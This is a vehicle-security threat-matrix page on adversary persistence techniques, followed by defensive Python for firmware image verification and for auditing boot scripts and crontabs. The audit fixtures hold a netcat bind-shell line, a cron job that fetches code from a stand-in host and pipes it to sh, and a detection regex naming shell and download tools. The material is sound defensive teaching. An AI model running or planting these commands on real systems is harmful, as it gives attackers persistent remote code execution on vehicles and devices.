Persistence

The adversary is trying to maintain their foothold.

Persistence consists of techniques that adversaries use to keep access to systems across restarts, changed credentials, and other interruptions that could cut off their access. Techniques used for persistence include any access, action, or configuration changes that let them maintain their foothold on systems, such as replacing or hijacking legitimate code or adding startup code.

ID: TA0003
Created: 03 December 2023
Last Modified: 03 December 2023

Techniques

Techniques: 6
T2019 Account Manipulation
Adversaries may manipulate accounts to maintain and/or elevate access to vehicle systems. This technique involves actions that preserve or modify adversary access to compromised accounts, such as modifying credentials or permission groups. By manipulating accounts, adversaries can subvert security policies and gain persistent access to vehicle systems, potentially leading to privilege escalation.

T2020 Boot or Logon Initialization Scripts
Adversaries may use scripts automatically executed at boot or logon initialization to establish persistence. This technique allows adversaries to execute commands, scripts, or binaries during the boot-up or logon process, enabling them to establish a foothold and ensure continued access to the vehicle's systems.

T2021 Modify Trusted Execution Environment
Adversaries may target the trusted execution environment, such as the vehicle's secure boot process or cryptographic keys, to modify the system's behavior and maintain their presence within the vehicle's network. By tampering with these trusted components, adversaries can ensure that their unauthorized access and control persist even after reboots or software updates. This allows them to continue malicious activities, such as intercepting or manipulating vehicle communication, compromising safety systems, or stealing sensitive data.

T2022 Rewrite ECU Image/Firmware
Adversaries may manipulate an ECU image or firmware to maintain persistent access to vehicle systems. This technique involves altering the software running on the vehicle's electronic control units (ECUs) to establish a foothold and maintain control over the vehicle's functions.

T2017 Scheduled Task/Job
Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires membership in an admin or otherwise privileged group on the remote system.

T2011 Valid Accounts
Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop. Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence. In some cases, adversaries may abuse inactive accounts: for example, those belonging to individuals who are no longer part of an organization. Using these accounts may allow the adversary to evade detection, as the original account user will not be present to identify any anomalous activity taking place on their account. The overlap of permissions for local, domain, and cloud accounts across a network of systems is of concern because the adversary may be able to pivot across accounts and systems to reach a high level of access (i.e., domain or enterprise administrator) to bypass access controls set within the enterprise.
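The defender-side counterpart to T2022 (Rewrite ECU Image/Firmware) and T2021 (Modify Trusted Execution Environment) is a boot-time image check that a rewritten flash image cannot pass without the signing key. The following is an added example, not code from this page or from any vehicle platform: it uses a constructed image layout (magic, version, payload length, payload, 32-byte tag) and an HMAC-SHA256 tag with a module-level key that stands in for a key held inside an HSM. The same shape underlies HSM-based secure boot in the SHE family, which uses AES-CMAC with a key the application CPU cannot read; HMAC is used here only because it needs nothing beyond the standard library. The payload bytes and the key value are constructed for the demo.

```python
import hashlib
import hmac
import struct

# Constructed image layout for this example (not a vendor format):
#   magic(4) | version(4, big-endian) | payload_len(4, big-endian) | payload | tag(32)
# The tag covers header + payload, so the version and length fields are authenticated too.
MAGIC = b"ECUF"
HEADER = struct.Struct(">4sII")
TAG_LEN = 32

# Assumption: stands in for a MAC key that a real ECU keeps inside its HSM/secure element,
# usable by the bootloader but never readable by application code.
BOOT_MAC_KEY = bytes.fromhex("00112233445566778899aabbccddeeff00112233445566778899aabbccddeeff")


def build_image(version, payload, key=BOOT_MAC_KEY):
    """Produce an image the way the OEM signing station would (the side that holds the key)."""
    header = HEADER.pack(MAGIC, version, len(payload))
    tag = hmac.new(key, header + payload, hashlib.sha256).digest()
    return header + payload + tag


def verify_image(image, min_version, key=BOOT_MAC_KEY):
    """Bootloader-side check. Returns (ok, reason).

    Structural checks run first so a truncated or padded image cannot cause bad slicing;
    the anti-rollback version check runs last, after the MAC, so an unauthenticated
    header field never influences the decision."""
    if len(image) < HEADER.size + TAG_LEN:
        return False, "too short"
    magic, version, payload_len = HEADER.unpack_from(image, 0)
    if magic != MAGIC:
        return False, "bad magic"
    if payload_len != len(image) - HEADER.size - TAG_LEN:
        return False, "length mismatch"
    body, tag = image[:-TAG_LEN], image[-TAG_LEN:]
    expected = hmac.new(key, body, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):  # constant-time comparison
        return False, "MAC mismatch"
    if version < min_version:
        return False, "rollback"
    return True, "ok"


# Constructed payload standing in for the application firmware.
PAYLOAD = b"\x7fELF" + bytes(range(64))


def demo():
    """Exercise the checks a rewritten-firmware attack has to get past."""
    genuine = build_image(3, PAYLOAD)
    results = {"genuine": verify_image(genuine, min_version=2)}

    # Attacker patches one byte of application code in flash.
    patched = bytearray(genuine)
    patched[HEADER.size + 10] ^= 0xFF
    results["patched"] = verify_image(bytes(patched), min_version=2)

    # Attacker rebuilds a whole image under a guessed key (the real key never leaves the HSM).
    forged = build_image(3, PAYLOAD + b"backdoor", key=b"guess")
    results["forged"] = verify_image(forged, min_version=2)

    # Attacker re-flashes an older, genuinely signed but vulnerable release.
    old = build_image(1, PAYLOAD)
    results["rollback"] = verify_image(old, min_version=2)

    results["truncated"] = verify_image(genuine[:20], min_version=2)
    return results


if __name__ == "__main__":
    for name, (ok, reason) in demo().items():
        print(f"{name:10s} {'ACCEPT' if ok else 'REJECT'} ({reason})")
```

Two points of the design matter more than the primitive: the length and magic checks happen before any slicing, and the version compare happens only after the tag has verified, so nothing the attacker controls in the header is trusted early. With a MAC-based scheme the verifier holds the same key as the signer, which is why production designs keep it in an HSM or use an asymmetric signature rooted in a fused public-key hash instead.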
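For T2020 (Boot or Logon Initialization Scripts) and T2017 (Scheduled Task/Job) the practical check is an inventory diff: compare the startup scripts and scheduled jobs present on a unit with what the release image is known to install. The following is an added example, not code from this page or from any vendor tooling, and it assumes a Linux-based ECU (a telematics or head unit) using SysV-style /etc/init.d scripts and a system crontab. The golden baseline, the on-device script contents, and the crontab lines are all constructed for the demo; the 198.51.100.7 address is from the documentation range.

```python
import hashlib
import re


def sha256(data):
    return hashlib.sha256(data).hexdigest()


# --- Constructed device state (not real vehicle data) ---------------------------------
# Golden baseline: startup scripts as shipped in the signed release image.
GOLDEN = {
    "/etc/init.d/S40network": b"#!/bin/sh\n/sbin/ifup -a\n",
    "/etc/init.d/S50telematics": b"#!/bin/sh\n/usr/bin/tcu-daemon &\n",
}
BASELINE = {path: sha256(content) for path, content in GOLDEN.items()}

# What is on the unit now: one script has an appended line, one script is new.
CURRENT = {
    "/etc/init.d/S40network": b"#!/bin/sh\n/sbin/ifup -a\n",
    "/etc/init.d/S50telematics": b"#!/bin/sh\n/usr/bin/tcu-daemon &\n/tmp/.cache/agent -d &\n",
    "/etc/init.d/S99diag": b"#!/bin/sh\nnc -l -p 4444 -e /bin/sh &\n",
}

# /etc/crontab as read from the unit (system crontab format: five time fields, user, command).
CRONTAB_LINES = [
    "SHELL=/bin/sh",
    "PATH=/usr/sbin:/usr/bin:/sbin:/bin",
    "# m h dom mon dow user command",
    "17 *\t* * *\troot\tcd / && run-parts --report /etc/cron.hourly",
    "0 3 * * *\troot\t/usr/bin/ota-check",
    "@reboot root /tmp/.cache/agent -d",
    "*/5 * * * * root curl -s http://198.51.100.7/u | sh",
]
# Jobs the release is known to install; anything else is a finding.
ALLOWED_JOBS = {"cd / && run-parts --report /etc/cron.hourly", "/usr/bin/ota-check"}

CRON_ENTRY = re.compile(r"^(?:\S+\s+){5}(?P<user>\S+)\s+(?P<cmd>.+)$")
# Heuristics for a job body that should not appear on a production ECU.
SUSPICIOUS = re.compile(r"(/tmp/|/dev/shm/|\b(nc|ncat|curl|wget)\b|base64\s+-d|\|\s*(ba)?sh\b)")


def audit_startup_scripts(baseline, current):
    """Compare on-device boot scripts with the baseline. Returns [(status, path)]."""
    findings = []
    for path, content in current.items():
        if path not in baseline:
            findings.append(("new", path))
        elif baseline[path] != sha256(content):
            findings.append(("modified", path))
    for path in baseline:
        if path not in current:
            findings.append(("missing", path))
    return findings


def audit_crontab(lines, allowed):
    """Parse a system crontab and return one finding dict per suspect line.

    Handles the @reboot/@daily special strings, which replace the five time fields
    and are themselves a common boot-time persistence hook."""
    findings = []
    for lineno, raw in enumerate(lines, 1):
        line = raw.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue  # blank line, comment, or environment assignment
        if line.startswith("@"):
            parts = line.split(None, 2)
            if len(parts) != 3:
                findings.append({"line": lineno, "user": None, "cmd": line, "reasons": ["unparseable"]})
                continue
            user, cmd = parts[1], parts[2]
        else:
            m = CRON_ENTRY.match(line)
            if not m:
                findings.append({"line": lineno, "user": None, "cmd": line, "reasons": ["unparseable"]})
                continue
            user, cmd = m.group("user"), m.group("cmd").strip()
        reasons = []
        if cmd not in allowed:
            reasons.append("unlisted")
        if SUSPICIOUS.search(cmd):
            reasons.append("suspicious")
        if reasons:
            findings.append({"line": lineno, "user": user, "cmd": cmd, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for status, path in audit_startup_scripts(BASELINE, CURRENT):
        print(f"startup script {status}: {path}")
    for f in audit_crontab(CRONTAB_LINES, ALLOWED_JOBS):
        print(f"crontab line {f['line']} ({f['user']}): {', '.join(f['reasons'])}: {f['cmd']}")
```

The allowlist comparison is the reliable signal; the regex heuristics only add a reason to a line that is already unlisted or catch a known-bad pattern in a job that happens to be on the list. On a real unit the baseline should come from the signed release manifest rather than from a file stored on the device itself, since anything writable on the device is also writable by the adversary that installed the persistence.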